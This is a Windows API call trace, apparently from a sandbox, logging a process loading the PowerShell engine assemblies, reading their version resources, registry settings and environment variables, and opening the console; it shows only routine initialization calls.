	[0868.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0868.712] SetErrorMode (uMode=0x1) returned 0x1
	[0868.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdda0 | out: lpFileInformation=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0868.712] SetErrorMode (uMode=0x1) returned 0x1
	[0868.712] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce010 | out: lpdwHandle=0xce010) returned 0x94c
	[0868.713] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d0c860 | out: lpData=0x2d0c860) returned 1
	[0868.714] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdf88, puLen=0xcdf80 | out: lplpBuffer=0xcdf88*=0x2d0c8fc, puLen=0xcdf80) returned 1
	[0868.714] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0c9d8, puLen=0xcdef0) returned 1
	[0868.714] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0868.714] CoTaskMemAlloc (cb=0x2e) returned 0x1eedf0
	[0868.714] lstrcpyW (in: lpString1=0x1eedf0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0868.714] CoTaskMemFree (pv=0x1eedf0) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0ca2c, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="System.Management.Automation") returned 28
	[0868.715] CoTaskMemAlloc (cb=0x3c) returned 0x1646c0
	[0868.715] lstrcpyW (in: lpString1=0x1646c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0868.715] CoTaskMemFree (pv=0x1646c0) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0ca88, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0868.715] CoTaskMemAlloc (cb=0x20) returned 0x1ec380
	[0868.715] lstrcpyW (in: lpString1=0x1ec380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0868.715] CoTaskMemFree (pv=0x1ec380) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0cac8, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0868.715] CoTaskMemAlloc (cb=0x44) returned 0x1646c0
	[0868.715] lstrcpyW (in: lpString1=0x1646c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0868.715] CoTaskMemFree (pv=0x1646c0) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0cb30, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0868.715] CoTaskMemAlloc (cb=0x76) returned 0x192fe0
	[0868.715] lstrcpyW (in: lpString1=0x192fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0868.715] CoTaskMemFree (pv=0x192fe0) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0cbcc, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0868.715] CoTaskMemAlloc (cb=0x44) returned 0x1646c0
	[0868.715] lstrcpyW (in: lpString1=0x1646c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0868.715] CoTaskMemFree (pv=0x1646c0) 
	[0868.715] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0cc30, puLen=0xcdef0) returned 1
	[0868.715] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0868.715] CoTaskMemAlloc (cb=0x58) returned 0x150d00
	[0868.715] lstrcpyW (in: lpString1=0x150d00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0868.716] CoTaskMemFree (pv=0x150d00) 
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0ccac, puLen=0xcdef0) returned 1
	[0868.716] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0868.716] CoTaskMemAlloc (cb=0x20) returned 0x1ec380
	[0868.716] lstrcpyW (in: lpString1=0x1ec380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0868.716] CoTaskMemFree (pv=0x1ec380) 
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x2d0c954, puLen=0xcdef0) returned 1
	[0868.716] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0868.716] CoTaskMemAlloc (cb=0x66) returned 0x1eacb0
	[0868.716] lstrcpyW (in: lpString1=0x1eacb0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0868.716] CoTaskMemFree (pv=0x1eacb0) 
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x0, puLen=0xcdef0) returned 0
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x0, puLen=0xcdef0) returned 0
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdef8, puLen=0xcdef0 | out: lplpBuffer=0xcdef8*=0x0, puLen=0xcdef0) returned 0
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdec8, puLen=0xcdec0 | out: lplpBuffer=0xcdec8*=0x2d0c8fc, puLen=0xcdec0) returned 1
	[0868.716] CoTaskMemAlloc (cb=0x204) returned 0x1957f0
	[0868.716] VerLanguageNameW (in: wLang=0x0, szLang=0x1957f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0868.716] CoTaskMemFree (pv=0x1957f0) 
	[0868.716] VerQueryValueW (in: pBlock=0x2d0c860, lpSubBlock="\\", lplpBuffer=0xcdf18, puLen=0xcdf10 | out: lplpBuffer=0xcdf18*=0x2d0c888, puLen=0xcdf10) returned 1
	[0868.726] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0868.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.726] CoTaskMemFree (pv=0x1a4520) 
	[0868.731] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0868.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.731] CoTaskMemFree (pv=0x1a4520) 
	[0868.735] lstrlenW (lpString="䅁") returned 1
	[0869.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdde8 | out: phkResult=0xcdde8*=0x2d0) returned 0x0
	[0869.446] RegOpenKeyExW (in: hKey=0x2d0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcddd8 | out: phkResult=0xcddd8*=0x2d4) returned 0x0
	[0869.446] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcde68 | out: phkResult=0xcde68*=0x2d8) returned 0x0
	[0869.451] RegQueryValueExW (in: hKey=0x2d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcddac, lpData=0x0, lpcbData=0xcdda8*=0x0 | out: lpType=0xcddac*=0x1, lpData=0x0, lpcbData=0xcdda8*=0x56) returned 0x0
	[0869.452] CoTaskMemAlloc (cb=0x5a) returned 0x1eac40
	[0869.452] RegQueryValueExW (in: hKey=0x2d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdd7c, lpData=0x1eac40, lpcbData=0xcdd78*=0x56 | out: lpType=0xcdd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdd78*=0x56) returned 0x0
	[0869.452] CoTaskMemFree (pv=0x1eac40) 
	[0869.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0869.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0869.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0870.901] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0870.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.901] CoTaskMemFree (pv=0x1a4520) 
	[0873.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0873.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0875.292] CoTaskMemAlloc (cb=0x104) returned 0x13ea90
	[0875.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13ea90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.292] CoTaskMemFree (pv=0x13ea90) 
	[0875.293] CoTaskMemAlloc (cb=0x104) returned 0x13ea90
	[0875.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13ea90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.293] CoTaskMemFree (pv=0x13ea90) 
	[0876.097] CoTaskMemAlloc (cb=0x104) returned 0x13ea90
	[0876.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13ea90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.097] CoTaskMemFree (pv=0x13ea90) 
	[0876.100] CoTaskMemAlloc (cb=0x104) returned 0x13ea90
	[0876.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13ea90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.100] CoTaskMemFree (pv=0x13ea90) 
	[0876.100] CoTaskMemAlloc (cb=0x104) returned 0x13ea90
	[0876.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13ea90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.100] CoTaskMemFree (pv=0x13ea90) 
	[0877.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0877.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0879.390] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0879.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0879.390] CoTaskMemFree (pv=0x1a4520) 
	[0879.395] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0879.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0879.395] CoTaskMemFree (pv=0x1a4520) 
	[0882.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0882.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0901.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0901.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0901.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0901.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0909.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0909.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0915.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0915.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0926.621] CoTaskMemAlloc (cb=0x104) returned 0x1baa90
	[0926.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1baa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.622] CoTaskMemFree (pv=0x1baa90) 
	[0926.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0927.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0930.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcdac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0930.966] SetErrorMode (uMode=0x1) returned 0x1
	[0930.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcdd40 | out: lpFileInformation=0xcdd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0930.966] SetErrorMode (uMode=0x1) returned 0x1
	[0957.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.256] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.256] CoTaskMemFree (pv=0x207270) 
	[0957.259] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.259] CoTaskMemFree (pv=0x207270) 
	[0957.259] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.259] CoTaskMemFree (pv=0x207270) 
	[0957.262] CoCreateGuid (in: pguid=0xce108 | out: pguid=0xce108*(Data1=0x90e23dc2, Data2=0xc880, Data3=0x43b4, Data4=([0]=0xbf, [1]=0xc5, [2]=0xcb, [3]=0xd6, [4]=0x70, [5]=0xb, [6]=0x5c, [7]=0x12))) returned 0x0
	[0957.265] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.265] CoTaskMemFree (pv=0x207270) 
	[0957.267] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.267] CoTaskMemFree (pv=0x207270) 
	[0957.269] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0957.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.269] CoTaskMemFree (pv=0x207270) 
	[0957.285] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0957.829] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcddb0 | out: lpConsoleScreenBufferInfo=0xcddb0) returned 1
